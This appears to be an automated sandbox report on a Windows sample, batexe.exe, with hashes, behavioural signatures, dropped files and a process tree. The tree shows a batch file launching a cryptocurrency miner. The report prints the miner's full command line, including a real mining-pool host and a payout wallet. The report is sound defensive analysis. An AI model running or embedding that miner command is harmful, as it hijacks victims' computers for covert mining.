73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 00:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3252	b2e.exe
2628	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2628	cpuminer-sse2.exe
2628	cpuminer-sse2.exe
2628	cpuminer-sse2.exe
2628	cpuminer-sse2.exe
2628	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/428-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 428 wrote to memory of 3252	428	batexe.exe	73
PID 428 wrote to memory of 3252	428	batexe.exe	73
PID 428 wrote to memory of 3252	428	batexe.exe	73
PID 3252 wrote to memory of 2228	3252	b2e.exe	74
PID 3252 wrote to memory of 2228	3252	b2e.exe	74
PID 3252 wrote to memory of 2228	3252	b2e.exe	74
PID 2228 wrote to memory of 2628	2228	cmd.exe	77
PID 2228 wrote to memory of 2628	2228	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:428
- C:\Users\Admin\AppData\Local\Temp\9A7B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9A7B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9A7B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A076.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9A7B.tmp\b2e.exe

Filesize
2.7MB

MD5
ca665a99135348c65d1f200581f6271d

SHA1
4b2ca0e171818035197956911bbb31965ab3847b

SHA256
7f8d31be2fc52d882352596e9fd722637bf5ed2151250c8c6037a75072c6e896

SHA512
785e2a83a14e291ccb69ea307c46bca812e348229682dc7fbe77e8d2712cdaaad0c6a7ae75648f64beb375ba8cbf193fe4259e0b949db8d9a263c49053068b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\9A7B.tmp\b2e.exe

Filesize
2.7MB

MD5
0a4f90939ad89fb74e007981af389c56

SHA1
6a1e9c52c9ebb458af465e3c701c8cab742b884c

SHA256
11b48ed7b26f6296c6be05a899c3ce5a65f54ee239c71d0b82761cea904cdef4

SHA512
ba8df936f0ae36c0f09fb94036749532acbb5fa176783feb166a8eea887fb5f913afd26b678755edcb1050a20398d0619c40f1f268a17851112bea721be0aae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\A076.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
342KB

MD5
06ac1a2215a4aaf35bfc49c4955b4181

SHA1
11ddca314f9440175d3bbc77ba49e9dc7650b6f0

SHA256
a70260ae49c4ec1fc2f0474dbbed20a2536188150c71d4c95a89b34407eb94ec

SHA512
235b945eeb943be8482aa79548a26b56b55fe438e461412c9a9e0fb9834b753aa42c069d765e1a38ac73f9225202d9f235162a9419da1578b3b279f3aefcfd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
232KB

MD5
2a517db6a47557b417a72a8798255777

SHA1
33776c0ec7e8f873cc840589f601026985825d42

SHA256
8ede6a66767fc25881a739d42e8a9c8886370201e18d1c64598252462f1af3e3

SHA512
788727807a59cd6ed5353741a9da8eaacdd7ecf63c554a18c966da4ed8be3e602e7fc6a8acda4a1b581a8042c601c763c75f321f478bf358cebb470ff2eb22de

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
378KB

MD5
2aea34b6f0eaedc3c4aa371c2cf99f41

SHA1
3034f5f864e12388117483249e5b41855cfa7b8b

SHA256
f9e040661bd95b999025f3b1f1c67099c91847d80c3726de75b8c5b6508f44ae

SHA512
6cc7ab2b89c373b5f1b292e3b6ce491f612a1cb09964103eb45f7bc2919a853dfdb970103b1076f6935454de3bd3b24d04fe03734540f3f313a55c2b1c40fd37

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
482KB

MD5
8483b80ca1fd733c160ecac93fad84b8

SHA1
624f244245afb869867fe98733b1c178504fac71

SHA256
db4df55d5e28d46ed7109f077b296fa31352f8d075ff610a06ec10a7330dc441

SHA512
4238505c1f1af99d150a2fb34cd852df6990169c81c40084c5a0eb6815f239a2b5a129d3bc9ba71c4be4184df63121c047deaa345aa558c7f85907cf2b921663

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
453KB

MD5
73d7c4c65e6f40829ce5093f3bec1ee5

SHA1
7ab1a53ead7a65a3598049c5b869c89f6b83c542

SHA256
852dd5f46e2a0c3dfafe37ca0a5f6f107a04950780853aa4aadb26101916fff9

SHA512
696b71cd43304bafd305f0d679263b5d49db62ea3ecf7ca0037649ba9e370191beb26f379c68f5c7429c88f1b6fb7b7d2205219498e26372f0eca154ed40f154

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
513KB

MD5
91b81525e5a29e570ec14601f6861a18

SHA1
f6590893164a4e2e35316318fbb91750dea3c236

SHA256
59fd1982df27bebc83ccc877e31093a1e6195721c3e2d6694d3231a01ebd793a

SHA512
8f3cb749f41d1c6e6681b2c1fbe14c32ff3a5364d8673b671399fd2492e0b8e05f8e09a40cb6a050cf24b6fa4b3fe6e2e5fb5952f5dc99b096fc3f99e98e3259

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
455KB

MD5
83e0492d463eba7a17ac4cc4c0378fac

SHA1
421fc69171d7ee03608a44a851f93efdffdd0d9f

SHA256
3678c8fe6872e165e4029c6b026db8f6b2166ff9be3b5747b8103296489c58b7

SHA512
cf8ffae2c524057ffc642e50ae50e4b5786d37f7d68d3f87045f543a27c2385ae464e02cc5cee0c90783bcbc5e46d08ad3986524e06a8f6f5de5deb51f9e6404

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
359KB

MD5
4cec10cb7ae70616291f112c02c3b2fe

SHA1
4b065986bea1b72a591861400e46905337e8529a

SHA256
b9daefec4adc665956183525c4906dc0a4bc398e1f023446a0047ba755b4ba08

SHA512
4ea94b51a63f409bc7192820834bea9cb40bd8228fe9051c3f3c238fa8b619d469935dfd7d93e61cfe15c9312aa0dba503f79d2ec86b677f9371d54a5bf6ebe6

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
488KB

MD5
de04c1c9e356744ccf9f63ee50ef0570

SHA1
6ada6ed6f467b61e38dd9795ebbf1bc9cb141385

SHA256
2a66453215da6b4cd2fc9954efcfbdccdf177fd5321672f48c414d5a956454c4

SHA512
cfc1395ad986f50ea3d39170d000fce74b5442ff0a81e9077377f998ba3cf31f6b4339eac65ce9878472bfddee0ff1a0b0b7d205af0210ec3a9a456126117e94

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
446KB

MD5
df1702a4f34c1191bd1bc29f51eff4d5

SHA1
00d504b21906e73539e0d0be97f8a1e132fdc2a7

SHA256
b879ee98bae76081eb378ce22fc27f7278864d99803643e7da6534687aba0752

SHA512
8c383a3f11657348f5dd2c3ab6fb91ea2552e0eaefeec223d315a30154b254b0b89c372508215aadd51cfe32dbfb29af5343129456d7ca6cecc573f75b385f10

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
507KB

MD5
d6b36cbc46710bf8067ccd598bb5d5f3

SHA1
c36aa973483968bd755eb58b61bd2d479beeb528

SHA256
834fe7f1a1be352e65f2387664e90c5a189689a0f5686dce0b45e3a4768fafda

SHA512
d216c970b24cc8fac14cdeb5518be5b448fa277030d8f0ffd9f08ae28fa57458dac81c28e53f40760ca005e7aaecb5e4c6371aaa90d5d9d22554ea8db170df3f

Download Submit
memory/428-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2628-42-0x00000000724C0000-0x0000000072558000-memory.dmp

Filesize
608KB

Download
memory/2628-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2628-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2628-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2628-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2628-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3252-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download